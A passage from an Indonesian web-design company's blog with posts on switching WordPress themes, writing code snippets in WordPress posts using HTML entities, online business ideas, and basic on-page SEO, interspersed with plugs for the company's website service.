Kemudian, copy semua perubahan yang ada di sidebar.php sekarang. Kita perlu paste semua ke sidebar.php theme wordpress pengganti.

  • Memperhatikan Google Analytics.

Mayoritas dari kita pasti menggunakan analytics. Bagi yang belum, pergunakanlan Google Analytics yang lengkap, akurat dan gratis.

Beberapa theme memiliki tempat untuk mempaste code Google Analytics. Jika theme berubah, maka traking Google tadi ikut hilang.

  • Memperhatikan RSS Feeds.

Ada beberapa theme yang mengijinkan integrasi RSS Feeds lewat panel theme bersangkutan. Untuk theme semacam ini, kita perlu copy dan paste alamat RSS kita ke tempat baru saat theme diganti.

  • Backup.

Kita perlu backup situs kita termasuk plugin lama kita. Meskipun mungkin tidak ada apa – apa, tetapi akan lebih baik jika terjadi sesuatu.

  • Mengaktifkan maintenance mode.

Saat kita mengganti theme, lebih baik kita mengaktifkan maintenance mode sehingga pengunjung tidak melihat situs yang sedang rusak.

  • Mengetest semua fungsi dan plugin.

Sekali theme kita aktif, maka semua plugin harus kita pastikan berfungsi. Untuk fitur atau modifikasi yang kita buat langsung di theme, maka kita akan mengembalikannya. Kita bisa membuka catatan awal kita dan menambah snippet di theme baru.

Untuk plugin, kita juga perlu memastikan semua layout sesuai dengan layout theme baru.

  • Mengetest di browser berbeda.

Gunakan sebanyak mungkin browser untuk mengetest theme kita. Sebuah fakta yang kurang nyaman adalah, template berdesain bagus sering “rusak” di browser berbeda.

Saat ini, masing – masing browser memiliki cara rendering sendiri – sendiri.

  • Memastikan iklan pihak ketiga terlihat baik.

Iklan adsense atau properti pihak ketiga lain mungkin memiliki warna serta layout yang cocok dengan theme awal. Sekarang kita perlu menyesuaikannya dengan theme baru jika memang TOS mereka mengijinkan.

Warna text, link atau background dan layout merupakan item utama untuk kita selaraskan dengan theme baru kita.

  • Meminta pendapat pengunjung.

Kita bisa memberitahu pengunjung jika theme kita berubah. Kemudian sekaligus meminta merekamengirim komentar jika ada bug atau error.

Melalui komentar mereka, kita akan lebih mudah melihat kekurangan seting kita pada theme baru wordpress.

  • Memangkas penggunaan plugin.

Template wordpress saat ini banyak yang dilengkapi dengan plugin didalamnya. Ada plugin SEO, builder dan sebagainya. Jika theme kita sudah dilengkapi envira gallery, maka kita bisa membuang envira gallery kita yang lama.

Tetapi, untuk plugin SEO, kami tetap merekomendasikan Plugin SEO dari YOAST.

  • Mengubah theme baru perlahan – lahan.

Karena ini adalah theme baru, maka kita perlu menyesuaikan diri. Juga kita perlu mengubahnya sedikit demi sedikit.

Kita perlu memahami bahasa coding theme baru kita sebelum membuat perubahan besar.

  • Mengetest loading time.

Kita perlu mengetest apakah loading time situs wordpress kita sekarang lebih cepat atau sama dengan yang dulu.

Jika ternyata lebih lambat, ada beberapa cara untuk meningkatkan kecepatan situs wordpress.

  • Melihat hasil iklan.

Penggantian theme biasanya disertai penggantian warna, layout dan sebagainya. Hal semacam ini pasti mempengaruhi pendapatan iklan kita. Jika menurun, maka kita bisa mencoba beberapa layout iklan baru atau warna baru untuk theme dan iklan kita.

  • Memonitor Bounce Rate.

Setiap perubahan desain pasti membawa perubahan lainnya. Internet adalah tempat dimana orang tidak cukup sabar menunggu. Mereka bisa berganti situs kapanpun. Jadi kita perlu melihat bounce rate kita. Jika naik, maka kita bisa melihat apakah navigasi situs yang baru lebih mudah.

Apakah warnanya terlalu mengganngu, ataukan layoutnya terkesan membosankan.

  • Mendengarkan saran pengunjung dan memperbaiki situs.

Masih ingat bahwa kita meminta pengunjung memberikan komentar? Komentar mereka sebaiknya kita gunakan untuk meningkatkan situs kita.

Kesimpulan.

Mengganti theme atau template WordPress tidak semata – mata soal tampilan. Tetapi juga soal fungsi dan fitur situs kita.

Bagi Anda yang sibuk untuk membuat situs sendiri, kami siap membantu Anda. Harga website buatan kami terjangkau dan kualitasnya bersaing dengan jasa pembuatan website lainnya.

29 Sep 2021

Bagaimana Cara Menulis Kode Program di Post WordPress

Ada beberapa orang yang masih bingung dengan format tulisan kode program di post wordpress. Beberapa bahkan bingung bagaimana cara menulis kode program di post wordpress. Beberapa dari mereka menuliskannya saat post berada di mode “Visual.” Jika kita ingin menuliskan code program di post wordpress, kita mesti menuliskannya di mode “Text.”

Mode Visual membaca kode program seperti text biasa dan tidak mengeksekusinya. Bahkan, kode < dan > akan dikonversi menjadi &lt; dan &gt;. Sebenarnya, keduanya adalah karakter yang equivalent untuk < dan > tetapi tenttunya tidak akan dibaca oleh web browser sebagai program.

Tetapi, ada yang belum tahu juga bahwa wordpress memiliki fitur “auto correction” jadi teks dikutip sesuai bahasa kita. Masalahnya, kode program tertentu bisa terbaca dan dieksekusi oleh browser. Ini terjadi karena HTML editor tidak mengkonversi karakter semacam ini.

Selain itu, ada juga penmggunaan kode yang membuat penampilan website kita menjadi lucu. Misalnya, kita ingin menunjukan kode diantara text atau paragraf dengan membuat <code></code>.

Seperti:

<code>wp_title()</code>,

<code>wp_content()</code>

<code>wp_footer()</code>

Cara penulisan diatas membuat text terlihat seperti kode komputer.

Tetapi, kita bisa mendapatkan masalah apabila kita salah meletakkan tulisan diatas. Misalnya:

Lihat ke <code><div class=”header”></code> bagian untuk mengganti <code><h1></code> heading.

WordPress sejatinya tidak akan memproses kode diatas. WordPress hanya mengerti bahwa tulisan semacam itu dibuat untuk keperluan membuat format saja. Jadi, cara penulisan diatas akan dibiarkan saja.

Masalahnya, browser membaca <code> yang diikuti <div> sebagai perintah membuat kontainer

Hasilnya adalah:

jasa pembuatan website murah

Kita bisa menghindari hal seperti ini dengan menggunakan apa yang disebut dengan “html entity” dari tanda panah < dan >. Gampangnya, ini merupakan karakter mirip yang dikenal oleh HTML.

Daftarnya antaralain:

< = &lt; atau &#60;

>= &gt; atau &#62;

/ = &#47; ] = &#93;

[ = &#91; ” = &quot; atau &#34;

‘ = &#39;

“ = &ldquo; atau &#8220;

” = &rdquo; atau &#8220;

‘ = &lsquo; atau &#8216;

’ = &rsquo; atau &#8217;

& = &amp; atau &#38;

Jadi, tanda & bisa diganti &amp; Untuk tanda panah < diatas, diganti saja menjadi &lt;

Untuk menulis apa adanya sesuai format yang ditulis dalam suatu file, bisa digunakan element HTML <pre>.

<pre> Kalau ditulis begini

  spasi, titik dan koma...akan 

      sama

     baik letak ataupun          tulisannya

</pre>

Masalah yang cukup sering terjadi adalah masalah di “auto correction” milik wordpress. Fitur ini aktif baik kita menulis secara visual atau menggunakan HTML editor. Fitur ini akan mengkonversi kutipan langsung dengan “tanda kutip” di pembikaan dan penutupannya.

Cara menghindarinya:

gunakan HTML entity seperti

<code>&lt;p class=&#34; blue&#34;&gt;</code>

ketimbang menulis seperti:

<p class=”blue”>

Jika kita ingin mengganti font dan warna:

pre, code{
 direction: ltr;
 text-align: left;
 }
 pre {border: solid 1px blue;
 font-size: 1.3 em;
 color: blue;
 margin: 10px;
 padding:10px;
 background: #FFFFB3}
 code {font-size:1.2em;
     color: #008099}

Hasilnya seperti ini:

Menulis program di post wordpress memang ada tantangannya tersendiri. Terkadang, kita mesti mengesampingkan fitur bawaan wordpress dan membuat fitur kita sendiri untuk “memperbaiki” hasil akhirnya.

26 Sep 2021

7 Ide Bisnis Online yang Mudah Dikerjakan

7 Ide Bisnis Online yang Mudah Dikerjakan

Bisnis online yang tergolong mudah dilakukan sebenarnya lumayan banyak. Tetapi, untuk hasil yang baik, kita tetap harus melakukannya dengan standar yang baik juga.

Untuk memulai bisnis online, kita kemungkinan besar akan memerlukan website. Ada banyak peluang berbisnis online menggunakan website. Ada mulai dari program affiliate marketing hingga web untuk layanan jasa.

Kita, akan membahasnya satu – persatu:

  • Blog atau website affiliate marketing

  • Toko online dropship

  • Menjual hosting secara reseller.

  • Website atau blog kursus.

  • Situs web untuk jasa kita.

  • Situs lowongan kerja.

  • Membangun website untuk dijual lagi.

Mulai dari yang pertama.

  • Blog atau website affiliate marketing

Affiliate marketing merupakan bisnis yang baik untuk online. Jika ingin bisnis affiliate yang membayar tetapt waktu dah hasilnya masih bisa disetarakan Google Adsense, silahkan memilih Amazon. Jika ingin yang terpercaya lagi, Anda bisa memilih CJ.com.

Untuk affiliate marketing ini, kita bisa memilih menjual produk yang paling laku terjual.

Tetapi, ada tips yang lebih baik. Kita menjual dengan niche spesifik.

Misalnya, kita menjual furniture saja. Atau, kita menjual sepatu saja. Bersaing di niche khusus saat ini memang tidak lebih mudah. Tetapi, jika konsisten untuk selalu perform dalam 2 tahun, maka hasilnya bakal lumayan bagus.

Tips affiliasi

  • Fokus pada niche tertentu.

Website atau blog niche tertentu lebih cepat naik rangking di Google. Artinya, lebih cepat mendapatkan pengunjung dan konsumen.

  • Melakukan riset tentang affiliasi yang baik.

Amazon bukanlan affiliasi yang membayar paling banyak. Memang Amazon merupakan salah satu yang paling terpercaya. Tetapi, kini sering melakukan banned juga. CJ.com mungkin agak lebih fleksibel.

  • Posting secara teratur.

Gunanya, Google juga akan mengindeks web atau blog kita secara teratur. Artinya, rangking kita akan mudah naik di Google.

  • Toko online dropship

Mengapa tidak menggunakan marketplace saja yang gratis?

Gunanya, kita membangun merk toko kita.

Jika pengunjung banyak, mereka akan mengingat nama toko kita.

Yang penting, kita memiliki alamat yang mudah dihubungi dan jelas ada di situs kita. Alamat inilah yang akan membuat konsumen kita merasa percaya.

Tips dropship:

  • Fokus pada niche tertentu.

Alasannya, sama saja dengan diatas.

  • Bekerjasama dengan seler yang baik.

Seller dengan reputasi baik memiliki bintang 4,5 keatas dan waktu tanggapan atau responnya dibawah 5 menit.

Kita memerlukan waktu respon yang cepat. Ingat, kita menjual ke orang sebuah atau banyak produk yang belum menjadi milik kita. Jadi, respon dari pemilik produk yang cepat sangat penting.

Kita bisa forward informasi dengan cepat!

  • Tips lainnya, respon kita yang cepat!

Konsumen menyukai, jika tidak sangat menyukai penjual yang responnya cepat.

Ingat, mereka mungkin sedang menghubungi beberapa penjual sekaligus. Yang responnya paling bagus biasanya akan mendapatkan pembelian.

Website memungkinkan Anda membangun merk dari menjual produk Anda sendiri.

  • Menjual hosting secara reseller.

Ini adalah salah satu solusi untuk mendapatkan uang secara online.

Jika niche kita terkait dunia teknologi dan internet, kita bisa menjadi reseler web hosting.

Ada layanan web hosting indonesia serta luar negeri yang menawarkan reseller dengan komisi yang ukurannya lumayan.

  • Website atau blog kursus.

Kursus online bisa menjadi sumber penghasilan kita. Kita bisa menjual tips untuk fotografi, belajar panduan SBMPTN dan sebagainya.

Sebenarnya, kursus yang bisa kita tawarkan bisa sangat banyak.

Yang penting, apapun yang kita sampaikan disana bukanlah hal yang ada di dunia gratisan.

Jika ini yang terjadi, maka konsumen kita bisa kecewa. Kita tetap harus menjaga kualitas kursus kita.

  • Situs web untuk jasa kita

Bagi Anda yang memiliki keahlian, bisa membuat website untuk menawarkan jasa Anda. Bengkel, service AC ataupun jasa lainnya bisa menawarkannya melalui website.

Lawang Techno sendiri juga merupakan website yang menawarkan jasa kepada orang lain.

Jika ingin lebih dipercaya, kita bisa memberikan tips berbagai macam kepada pengunjung web / blog.

Apa tidak takut tersaing?

Tidak perlulah itu. Kan seperti memasak, yang ahli sentuhannya tetap berbeda!

Kalau ingin jasa pembuatan website profesional ya, datang saja ke kami. Langsung beres begitu…

Website lowongan pekerjaan

Yang agak disayangkan dari situs lowongan kerja adalah, mereka mencampur semua lowongan yang valid dengan yang tidak valid.

Lowongan yang tidak valid ini ada yang lowongannya tidak ada, hoax atau dibuat untuk tujuan lain. Untuk mengumpulkan berbagai identitas pelamar untuk keperluan mereka yang lain lagi.

Jika kita bisa menjaga lowongan yang ada di web kita valid dan terverifikasi, maka pelamar akan kembali kepada kita.

Jika kepercayaan masyarakat tinggi, kita bisa measang iklan lowongan berbayar milik perusahaan tertentu.

  • Membangun website untuk dijual lagi.

Yang terakhir ini agak absurd mungkin. Tetapi, selalu ada website bagus yang kemudian dijual.

Pada tahun 2009, saya pernah tahu ada sebuah website dengan niche WordPress.

Saya mengunjunginya untuk belajar membuat theme wordppress. Tetapi, ditengah jalan website itu dijual. (saat itu nilainya 40.000 usd).

Sayangnya, panduan membuat template WordPress itu dahulu tidak dilanjutkan pemilik barunya.

Tetapi, apapun cerita dengan web diatas, Anda tetap bisa membangun website Anda untuk dijual.

Kita bisa membuat website di niche tertentu, jika penghasilan kita disana lumayan, maka website / blog kita akan laku dijual.

Untuk harganya, biasanya saya secara pribadi memberi nilai antara 10 bulan hingga 12 bulan penghasilan bulanan adsense terakhir.

Alasannya, visitor kita bisa bertambah serta penghasilan bisa bertambah. Tetapi, bisa juga adsensenya kena banned jika ada yang tidak sesuai.

Untuk menjualnya, ada situs bernama Flippa.

Itulah beberapa jalan bagi kita untuk menghasilkan uang secara online. Semoga bermanfaat dan salam sukses luar biasa!

24 Sep 2021

Teknik Dasar On Page SEO untuk Situs Kita

Teknik SEO on-page untuk WordPress:

 

Secara mendasar, teknik on page SEO untuk website (wordpress) kita bisa dibagi menjadi 4 faktor.

  • Optimasi kata kunci

  • Tag, judul dan meta deskripsi

  • Internal link

  • Sitemap yang update dan komprehensif

SEO on page tidak meminta terlalu banyak. Tetapi memang harus kita kerjakan untuk setiap halaman posting kita.

Yang bagus, wordpress mempermudah kita dalam melakukan SEO on p0age tadi. Banyak fitur yang dibuat cocok untuk SEO

  • Optimasi kata kunci

Kita perlu membuat situs kita berputar disekitar satu kata kunci utama. Misal: wisata atau wisata Indonesia.

Ada lima tempat dimana kata kunci ini harus tampil di posting kita:

  • Di judul
  • Di paragrap pertama artikel kita
  • Di URL atau link kita
  • Di alt Text atribut untuk gambar di posting kita
  • Di halaman konten.

Penjelasan

  • Kata kunci di judul

Google menentukan tema posting kita berdasarkan judul posting kita. Tentunya kita juga tidak akan membuat judul dengan kata wisata dimana – mana. Hal semacam ini akan terkesan sebagai spam. Kita buat saja secara alami.

Biasanya, yang dibuat secara alami juga tidak terlihat sebagai spam untuk Google.

  • Di paragrap pertama artikel kita

Hal ini berguna bagi Google dan pengunjung kita. Mereka akan mudah melihat gambaran isi konten kita.

  • Menggunakan kata kunci di posting dan permalink

Permalink dari wordpress secara umum memiliki nilai SEO yang baik. Tetapi, kita selalu bisa mengeditnya lebih jauh lagi.

  • Gunakan alt text yang bermanfaat

Kita bisa menyisipkan kata kunci atau sesuatu yang relevan dengan gambar yang kita posting disana.

Jangan menggunakan alt text yang tidak relevan dengan gambar. Yang terganggu nantinya adalah para pengunjung kita. Jika mereka menemukan gambar berbeda dengan yang kita tempatkan di alt text, mereka akan menganggap situs kita tidak kredibel.

Besok lagi, mereka akan malas berkunjung ulang.

  • Menggunakan kata kunci di halaman konten (di posting).

Kita harus menggunakannya secara pantas. Secara umum, angka 2 hingga 3 persen kandungan kata kunci dalam artikel sudah masuk akal.

Jika terlalu banyak, maka justru akan terdeteksi sebagai spam oleh Google.

Faktanya, tulisan – tulisan saya yang berhasil masuk halaman utama / halaman depan Google tidak mengandung kata kunci lebih dari 2,5 %.

  • Tag, judul dan meta deskripsi

Kita perlu menggunakan kata kunci di tag kita. Jika katagori kita misalnya wisata air, maka tag kita bisa kita buat sebagai: wisata memancing.

Judul, seperti disebutkan didepan, kita membutuhkan kata kunci di judul kita.

Selain Google, pengunjung juga harus tahu apa isi konten kita melalui judulnya.

Ada yang mau mencoba menulis dengan judul: Toyota Avanza tetapi isinya tentang sate maranggi?

  • Internal link

Internal link mempermudah Google untuk mengetahui tentang apakah halaman kita yang mendapat link.

<a href=”https://www.lawangtechno.com”>jasa pembuatan website</a>

Kata jasa pembuatan website dikenal sebagai anchor text. anchor text ini membantu Google untuk membuat penilaian tentang apakah lawang techno.com itu.

Jadi, gunakan anchor text yang sesuai.

  • Sitemap yang update dan komprehensif

Faktor terakhir on-page SEO adalah sitemap yang komprehensif dan update. Kita akan mudah memberikan link kepada Google untuk diikuti. Dengan sitremap, Google bisa mencapai posting kita dalam maksimal 2 kali klik saja.

Biasanya, halaman yang mudah dicapai dengan maksimal 2 kali klik adalah halaman yang akan terindeks dengan cepat dan baik.

Artinya, kita akan mendapatkan rangking yang lebih tinggi di Google juga.

Kesimpulan:

On-page SEO adalah hal sederhana yang jangan sampai ditinggalkan jika kita menulis posting kita. On-Page SEO bisa membuat ranging kita di Google berbeda dalam banyak posisi untuk kata kunci incaran kita. Tentunya, pengunjung kitapun pada akhirnya akan berbeda jumahnya.

© 2023 Lawang Techno Jasa Pembuatan Website . All rights reserved.
Top
Call Now
Whatsapp CS1